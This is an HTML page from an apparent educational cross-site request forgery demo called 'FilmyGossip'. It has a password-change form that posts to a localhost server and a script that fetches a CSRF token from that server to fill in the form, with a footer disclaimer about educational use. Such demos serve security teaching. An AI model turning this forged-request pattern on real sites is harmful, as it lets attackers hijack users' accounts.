<!doctype html>
<html lang='en'>

<head>
    <meta charset='UTF-8' />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <link rel="stylesheet" href="style.css">
    <title>FilmyGossip</title>

    <body>
        <h1 id="heading"> Welcome to FilmyGossip </h1>
        <br>
        <div id="container">
            <h2 id="title">
                <u>Profile Settings</u>
            </h2>
            <br>
            <div id="form">
                <h3> Change Password</h3>
                <form action='http://localhost:1000/changePassword' method='POST'>
                    <label> Enter new Password : </label>
                    <input type='password' name='password' id='' />
                    <input type='text' value="_csrf" name="_csrf" id="_csrf" />
                    <button type='submit'> submit</button>
                </form>
            </div>
        </div>
        <hr>
        <footer>
            <p>FilmyGossip
                <span> &copy; 2019</span>
            </p>
            <p>
                <u>Contact Us:</u>
            </p>
            <p>Mail Id: filmyupdates@gossip.com</p>
            <p id="footer">** Disclaimer: This demo is only for Educational purpose. Please do not try this attack on any commercial website
                **
        </footer>
        <script>
            $.get('http://localhost:1000/api/getToken', function (data) {
                $('#_csrf').val(data._csrf);
            });
        </script>
    </body>

</html>